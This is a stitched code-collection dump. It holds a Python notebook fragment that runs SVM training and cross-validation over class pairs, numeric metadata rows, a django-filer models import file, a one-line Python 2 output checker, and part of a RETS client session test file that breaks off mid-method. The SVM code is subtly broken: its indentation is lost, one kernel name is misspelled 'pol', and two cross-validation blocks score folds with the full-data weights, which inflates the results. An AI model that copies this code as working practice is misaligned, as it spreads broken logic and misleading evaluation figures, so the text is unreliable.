w1 = weights((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))) > 1e-4).reshape(-1)], w1)
p8 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p8+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))) > 1e-4).reshape(-1)], w2)
p8+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p8+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))) > 1e-4).reshape(-1)], w3)
p8+= get_scores(tp_x_1,tp_t_1,w3,b3[0])
p8+= get_scores(tp_x_3,tp_t_3,w3,b3[0])
print('Cross_validation score',p8/6)
start1 = timer()
w = weights((cvx_fiting(1.0,text_x,text_t,compute_K('poly',text_x,1.0,1))),text_x,text_t)
b= text_t[((cvx_fiting(1.0,text_x,text_t,compute_K('poly',text_x,1.0,1))) > 1e-4).reshape(-1)] - np.dot(text_x[((cvx_fiting(1.0,text_x,text_t,compute_K('poly',text_x,1.0,1))) > 1e-4).reshape(-1)], w)
print('Training score',get_scores(text_x,text_t,w,b[0]))
w1 = weights((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.0,1))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.0,1))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.0,1))) > 1e-4).reshape(-1)], w1)
p4 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p4+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.0,1))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.0,1))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.0,1))) > 1e-4).reshape(-1)], w2)
p4+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p4+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.0,1))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.0,1))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('pol',tp_x_2,1.0,1))) > 1e-4).reshape(-1)], w3)
p4+= get_scores(tp_x_1,tp_t_1,w3,b3[0])
p4+= get_scores(tp_x_3,tp_t_3,w3,b3[0])
print('Cross_validation score',p4/6)
end1 = timer()
print('TIME',end1 - start1)
# In[2]:
# FOR CLASSES {2,3}
#training data
text_x_2 = (dp[632:1230,:25])
text_t_2 = (dp[632:1230,25]).astype('int')
for i in range(text_t_2.shape[0]):
if (text_t_2[i] == 2) :
text_t_2[i] = 1
else :
text_t_2[i] = -1
#testing data
tp_x_1 = np.append(dp[632:732,:25],dp[943:1043,:25],axis=0)
tp_t_1 = np.append(dp[632:732,25],dp[943:1043,25],axis=0)
tp_t_1 = tp_t_1.astype('int')
for i in range(tp_t_1.shape[0]):
if (tp_t_1[i] == 2) :
tp_t_1[i] = 1
else :
tp_t_1[i] = -1
tp_x_2 = np.append(dp[732:832,:25],dp[1043:1143,:25],axis=0)
tp_t_2 = np.append(dp[732:832,25],dp[1043:1143,25],axis=0)
tp_t_2 = tp_t_2.astype('int')
for i in range(tp_t_2.shape[0]):
if (tp_t_2[i] == 2) :
tp_t_2[i] = 1
else :
tp_t_2[i] = -1
tp_x_3 = np.append(dp[832:942,:25],dp[1143:1230,:25],axis=0)
tp_t_3 = np.append(dp[832:942,25],dp[1143:1230,25],axis=0)
tp_t_3 = tp_t_3.astype('int')
for i in range(tp_t_3.shape[0]):
if (tp_t_3[i] == 2) :
tp_t_3[i] = 1
else :
tp_t_3[i] = -1
support_vectors = np.where(cvx_fiting(7.74,text_x_2,(text_t_2),compute_K('linear',text_x_2,0,0)) > 1e-4)[0]
print(support_vectors)
support_vectors = np.where(cvx_fiting(1.29,text_x_2,(text_t_2),compute_K('rbf',text_x_2,1.0,0)) > 1e-4)[0]
print(support_vectors)
support_vectors = np.where(cvx_fiting(1.0,text_x_2,(text_t_2),compute_K('poly',text_x_2,1.0,5)) > 1e-9)[0]
print(support_vectors)
start3 = timer()
w = weights((cvx_fiting(7.74,text_x_2,text_t_2,compute_K('linear',text_x_2,0,0))),text_x_2,text_t_2)
b = text_t_2[((cvx_fiting(7.74,text_x_2,text_t_2,compute_K('linear',text_x_2,0,0))) > 1e-4).reshape(-1)] - np.dot(text_x_2[((cvx_fiting(7.74,text_x_2,text_t_2,compute_K('linear',text_x_2,0,0))) > 1e-4).reshape(-1)], w)
print('Training score',get_scores(text_x_2,text_t_2,w,b[0]))
w1 = weights((cvx_fiting(7.74,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(7.74,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(7.74,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))) > 1e-4).reshape(-1)], w1)
p2 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p2+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(7.74,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(7.74,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(7.74,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))) > 1e-4).reshape(-1)], w2)
p2+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p2+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(7.74,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(7.74,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(7.74,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))) > 1e-4).reshape(-1)], w3)
p2+= get_scores(tp_x_1,tp_t_1,w,b[0])
p2+= get_scores(tp_x_3,tp_t_3,w,b[0])
print('Cross_validation score',p2/6)
end3 = timer()
print('TIME',end3 - start3)
w = weights((cvx_fiting(1.29,text_x_2,text_t_2,compute_K('rbf',text_x_2,1.0,0))),text_x_2,text_t_2)
b = text_t_2[((cvx_fiting(1.29,text_x_2,text_t_2,compute_K('rbf',text_x_2,1.0,0))) > 1e-4).reshape(-1)] - np.dot(text_x_2[((cvx_fiting(1.29,text_x_2,text_t_2,compute_K('rbf',text_x_2,1.0,0))) > 1e-4).reshape(-1)], w)
print('Training score',get_scores(text_x_2,text_t_2,w,b[0]))
w1 = weights((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))) > 1e-4).reshape(-1)], w1)
p7 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p7+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))) > 1e-4).reshape(-1)], w2)
p7+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p7+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))) > 1e-4).reshape(-1)], w3)
p7+= get_scores(tp_x_1,tp_t_1,w3,b3[0])
p7+= get_scores(tp_x_3,tp_t_3,w3,b3[0])
print('Cross_validation score',p7/6)
start4 = timer()
w = weights((cvx_fiting(1.0,text_x_2,text_t_2,compute_K('poly',text_x_2,1.0,5))),text_x_2,text_t_2)
b = text_t_2[((cvx_fiting(1.0,text_x_2,text_t_2,compute_K('poly',text_x_2,1.0,5))) > 1e-9).reshape(-1)] - np.dot(text_x_2[((cvx_fiting(1.0,text_x_2,text_t_2,compute_K('poly',text_x_2,1.0,5))) > 1e-9).reshape(-1)], w)
print('Training score',get_scores(text_x_2,text_t_2,w,b[0]))
w1 = weights((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.0,5))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.0,5))) > 1e-9).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.0,5))) > 1e-9).reshape(-1)], w1)
p5 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p5+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.0,5))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.0,5))) > 1e-9).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.0,5))) > 1e-9).reshape(-1)], w2)
p5+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p5+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.0,5))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.0,5))) > 1e-9).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.0,5))) > 1e-9).reshape(-1)], w3)
p5+= get_scores(tp_x_1,tp_t_1,w3,b3[0])
p5+= get_scores(tp_x_3,tp_t_3,w3,b3[0])
print('Cross_validation score',p5/6)
end4 = timer()
print('TIME',end4 - start4)
# In[35]:
# FOR CLASSES {4,5}
#training data
text_x_3 = dp[1232:1800,:25]
text_t_3 = dp[1232:1800,25].astype('int')
for i in range(text_t_3.shape[0]):
if (text_t_3[i] == 4) :
text_t_3[i] = 1
else :
text_t_3[i] = -1
#testing data
tp_x_1 = np.append(dp[1232:1332,:25],dp[1533:1610,:25],axis=0)
tp_t_1 = np.append(dp[1232:1332,25],dp[1533:1610,25],axis=0)
tp_t_1 = tp_t_1.astype('int')
for i in range(tp_t_1.shape[0]):
if (tp_t_1[i] == 4) :
tp_t_1[i] = 1
else :
tp_t_1[i] = -1
tp_x_2 = np.append(dp[1333:1433,:25],dp[1610:1699,:25],axis=0)
tp_t_2 = np.append(dp[1333:1433,25],dp[1610:1699,25],axis=0)
tp_t_2 = tp_t_2.astype('int')
for i in range(tp_t_2.shape[0]):
if (tp_t_2[i] == 4) :
tp_t_2[i] = 1
else :
tp_t_2[i] = -1
tp_x_3 = np.append(dp[1433:1532,:25],dp[1700:1800,:25],axis=0)
tp_t_3 = np.append(dp[1433:1532,25],dp[1700:1800,25],axis=0)
tp_t_3 = tp_t_3.astype('int')
for i in range(tp_t_3.shape[0]):
if (tp_t_3[i] == 4) :
tp_t_3[i] = 1
else :
tp_t_3[i] = -1
support_vectors = np.where(cvx_fiting(1.29,text_x_3,(text_t_3),compute_K('linear',text_x_3,0,0)) > 1e-4)[0]
print(support_vectors)
support_vectors = np.where(cvx_fiting(1.29,text_x_3,(text_t_3),compute_K('rbf',text_x_3,1.0,0)) > 1e-4)[0]
print(support_vectors)
support_vectors = np.where(cvx_fiting(1.0,text_x_3,(text_t_3),compute_K('poly',text_x_3,1.29,1)) > 1e-4)[0]
print(support_vectors)
start7 = timer()
w = weights((cvx_fiting(1.29,text_x_3,text_t_3,compute_K('linear',text_x_3,0,0))),text_x_3,text_t_3)
b = text_t_3[((cvx_fiting(1.29,text_x_3,text_t_3,compute_K('linear',text_x_3,0,0))) > 1e-4).reshape(-1)] - np.dot(text_x_3[((cvx_fiting(1.29,text_x_3,text_t_3,compute_K('linear',text_x_3,0,0))) > 1e-4).reshape(-1)], w)
print('Training score',get_scores(text_x_3,text_t_3,w,b[0]))
w1 = weights((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))) > 1e-4).reshape(-1)], w1)
p5 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p5+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))) > 1e-4).reshape(-1)], w2)
p5+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p5+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))) > 1e-4).reshape(-1)], w3)
p5+= get_scores(tp_x_1,tp_t_1,w,b[0])
p5+= get_scores(tp_x_3,tp_t_3,w,b[0])
print('Cross_validation score',p5/6)
end7 = timer()
print('TIME',end7 - start7)
w4 = weights((cvx_fiting(1.29,text_x_3,text_t_3,compute_K('rbf',text_x_3,1.0,0))),text_x_3,text_t_3)
b4 = text_t_3[((cvx_fiting(1.29,text_x_3,text_t_3,compute_K('rbf',text_x_3,1.0,0))) > 1e-4).reshape(-1)] - np.dot(text_x_3[((cvx_fiting(1.29,text_x_3,text_t_3,compute_K('rbf',text_x_3,1.0,0))) > 1e-4).reshape(-1)], w4)
print('Training score',get_scores(text_x_3,text_t_3,w4,b4[0]))
w5 = weights((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))),tp_x_1,tp_t_1)
b5 = tp_t_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))) > 1e-4).reshape(-1)], w5)
p5 = get_scores(tp_x_2,tp_t_2,w5,b5[0])
p5+=get_scores(tp_x_3,tp_t_3,w5,b5[0])
w6 = weights((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))),tp_x_3,tp_t_3)
b6 = tp_t_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))) > 1e-4).reshape(-1)], w6)
p5+=get_scores(tp_x_2,tp_t_2,w6,b6[0])
p5+= get_scores(tp_x_1,tp_t_1,w6,b6[0])
w7 = weights((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))),tp_x_2,tp_t_2)
b7 = tp_t_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))) > 1e-4).reshape(-1)], w7)
p5+= get_scores(tp_x_1,tp_t_1,w7,b7[0])
p5+= get_scores(tp_x_3,tp_t_3,w7,b7[0])
print('Cross_validation score',p5/6)
start6 = timer()
w = weights((cvx_fiting(1.0,text_x_3,text_t_3,compute_K('poly',text_x_3,1.29,1))),text_x_3,text_t_3)
b = text_t_3[((cvx_fiting(1.0,text_x_3,text_t_3,compute_K('poly',text_x_3,1.29,1))) > 1e-9).reshape(-1)] - np.dot(text_x_3[((cvx_fiting(1.0,text_x_3,text_t_3,compute_K('poly',text_x_3,1.29,1))) > 1e-9).reshape(-1)], w)
print('Training score',get_scores(text_x_3,text_t_3,w,b[0]))
w1 = weights((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.29,1))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.29,1))) > 1e-9).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.29,1))) > 1e-9).reshape(-1)], w1)
p6 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p6+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.29,1))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.29,1))) > 1e-9).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.29,1))) > 1e-9).reshape(-1)], w2)
p6+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p6+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.29,1))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.29,1))) > 1e-9).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.29,1))) > 1e-9).reshape(-1)], w3)
p6+= get_scores(tp_x_1,tp_t_1,w3,b3[0])
p6+= get_scores(tp_x_3,tp_t_3,w3,b3[0])
print('Cross_validation score',p6/6)
end6 = timer()
print('TIME',end6 - start6)
# In[ ]:
| 50.181818
| 218
| 0.664569
| 5,125
| 20,976
| 2.388293
| 0.042146
| 0.068382
| 0.084967
| 0.023693
| 0.866503
| 0.850409
| 0.85
| 0.843791
| 0.841422
| 0.824101
| 0
| 0.12502
| 0.106169
| 20,976
| 417
| 219
| 50.302158
| 0.527815
| 0.014636
| 0
| 0.267267
| 0
| 0
| 0.04519
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012012
| false
| 0
| 0.03003
| 0
| 0.054054
| 0.099099
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
383ac1709cddad19258776defb52da6abd7f3ad6
| 305
|
py
|
Python
|
filer/models/__init__.py
|
mkoistinen/django-filer
|
8f2e81bc5a14638cb2092186d7dc54f6551d8ae5
|
[
"BSD-3-Clause"
] | null | null | null |
filer/models/__init__.py
|
mkoistinen/django-filer
|
8f2e81bc5a14638cb2092186d7dc54f6551d8ae5
|
[
"BSD-3-Clause"
] | null | null | null |
filer/models/__init__.py
|
mkoistinen/django-filer
|
8f2e81bc5a14638cb2092186d7dc54f6551d8ae5
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from filer.models.clipboardmodels import * # flake8: noqa
from filer.models.filemodels import * # flake8: noqa
from filer.models.foldermodels import * # flake8: noqa
from filer.models.imagemodels import * # flake8: noqa
from filer.models.virtualitems import * # flake8: noqa
| 38.125
| 58
| 0.737705
| 38
| 305
| 5.921053
| 0.368421
| 0.2
| 0.333333
| 0.355556
| 0.551111
| 0.551111
| 0
| 0
| 0
| 0
| 0
| 0.023166
| 0.15082
| 305
| 7
| 59
| 43.571429
| 0.84556
| 0.281967
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
383dc6d773e542c1e4108b6590f95fa3c1fcf9fc
| 60
|
py
|
Python
|
Codeforces/317 Division 1/Problem B/check.py
|
VastoLorde95/Competitive-Programming
|
6c990656178fb0cd33354cbe5508164207012f24
|
[
"MIT"
] | 170
|
2017-07-25T14:47:29.000Z
|
2022-01-26T19:16:31.000Z
|
Codeforces/317 Division 1/Problem B/check.py
|
navodit15/Competitive-Programming
|
6c990656178fb0cd33354cbe5508164207012f24
|
[
"MIT"
] | null | null | null |
Codeforces/317 Division 1/Problem B/check.py
|
navodit15/Competitive-Programming
|
6c990656178fb0cd33354cbe5508164207012f24
|
[
"MIT"
] | 55
|
2017-07-28T06:17:33.000Z
|
2021-10-31T03:06:22.000Z
|
print open('1.out','r').read() == open('2.out','r').read()
| 30
| 59
| 0.516667
| 11
| 60
| 2.818182
| 0.636364
| 0.258065
| 0.516129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036364
| 0.083333
| 60
| 1
| 60
| 60
| 0.527273
| 0
| 0
| 0
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
6988f4d631a6cc272417a92144711a6b037abf3d
| 19,638
|
py
|
Python
|
tests/test_session.py
|
bazeli/rets
|
3498de3e242b31faf39403061da1aea28b5b9a04
|
[
"MIT"
] | null | null | null |
tests/test_session.py
|
bazeli/rets
|
3498de3e242b31faf39403061da1aea28b5b9a04
|
[
"MIT"
] | null | null | null |
tests/test_session.py
|
bazeli/rets
|
3498de3e242b31faf39403061da1aea28b5b9a04
|
[
"MIT"
] | null | null | null |
import unittest
import responses
from rets.exceptions import RETSException
from rets.session import Session
class SessionTester(unittest.TestCase):
def setUp(self):
super(SessionTester, self).setUp()
with open('tests/rets_responses/Login.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Login.ashx',
body=contents, status=200, headers={'Set-Cookie': 'ASP.NET_SessionId=zacqcc1gjhkmazjznjmyrinq;'})
self.session = Session(login_url='http://server.rets.com/rets/Login.ashx', username='retsuser',
version='RETS/1.7.2', session_id_cookie_name='ASP.NET_SessionId')
self.session.login()
def test_system_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_system.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
sys_metadata = self.session.get_system_metadata()
self.assertEqual(sys_metadata['version'], '1.11.76001')
self.assertEqual(sys_metadata['system_id'], 'MLS-RETS')
def test_logout(self):
with open('tests/rets_responses/Logout.html') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Logout.ashx',
body=contents, status=200)
self.assertTrue(self.session.logout())
def test_resource_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_resources.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
resource = self.session.get_resource_metadata()
self.assertEqual(len(resource), 6)
def test_get_object(self):
with open('tests/rets_responses/GetObject.byte', 'rb') as f:
single = f.read()
with open('tests/rets_responses/GetObject_multipart.byte', 'rb') as f:
multiple = f.read()
multi_headers = {
'Content-Type': 'multipart/parallel; boundary="24cbd0e0afd2589bb9dcb1f34cf19862"; charset=utf-8',
'Connection': 'keep-alive', 'RETS-Version': 'RETS/1.7.2', 'MIME-Version': '1.0, 1.0'
}
single_headers = {'MIME-Version': '1.0, 1.0', 'Object-ID': '0', 'Content-ID': '2144466',
'Content-Type': 'image/jpeg', 'Connection': 'keep-alive',
'RETS-Version': 'RETS/1.7.2'}
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetObject.ashx',
body=single, status=200, headers=single_headers)
objs = self.session.get_object(resource='Property', object_type='Photo', content_ids='1', object_ids='1')
self.assertEqual(len(objs), 1)
self.assertEqual(objs[0]['content_md5'], '396106a133a23e10f6926a82d219edbc')
resps.add(resps.POST, 'http://server.rets.com/rets/GetObject.ashx',
body=multiple, status=200, headers=multi_headers)
objs1 = self.session.get_object(resource='Property', object_type='Photo', content_ids='1')
self.assertEqual(len(objs1), 9)
def test_get_object_location1(self):
with open('tests/rets_responses/GetObject_multipart_Location1.byte', 'rb') as f:
multiple = f.read()
multi_headers = {
'Content-Type': 'multipart/parallel; '
'boundary="FLEXLIAsmcpmiKpZ3uhewHnpQUlQNYzuNzPeUi0PIqCAxzgSRkpypX"; '
'charset=utf-8',
'Connection': 'keep-alive', 'RETS-Version': 'RETS/1.7.2', 'MIME-Version': '1.0, 1.0'}
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetObject.ashx',
body=multiple, status=200, headers=multi_headers)
objs1 = self.session.get_object(resource='Property', object_type='Photo', content_ids='1', location='1')
self.assertEqual(len(objs1), 41)
def test_preferred_object(self):
with open('tests/rets_responses/GetObject_multipart.byte', 'rb') as f:
multiple = f.read()
multi_headers = {
'Content-Type': 'multipart/parallel; boundary="24cbd0e0afd2589bb9dcb1f34cf19862"; charset=utf-8',
'Connection': 'keep-alive', 'RETS-Version': 'RETS/1.7.2', 'MIME-Version': '1.0, 1.0'}
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetObject.ashx',
body=multiple, status=200, headers=multi_headers)
obj = self.session.get_preferred_object(resource='Property', object_type='Photo', content_id=1)
self.assertTrue(obj)
resps.add(resps.POST, 'http://server.rets.com/rets/GetObject.ashx',
body=multiple, status=200)
resource = dict()
resource['ResourceID'] = 'Agent'
obj1 = self.session.get_preferred_object(resource=resource, object_type='Photo', content_id=1)
self.assertTrue(obj1)
def test_class_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_classes.xml') as f:
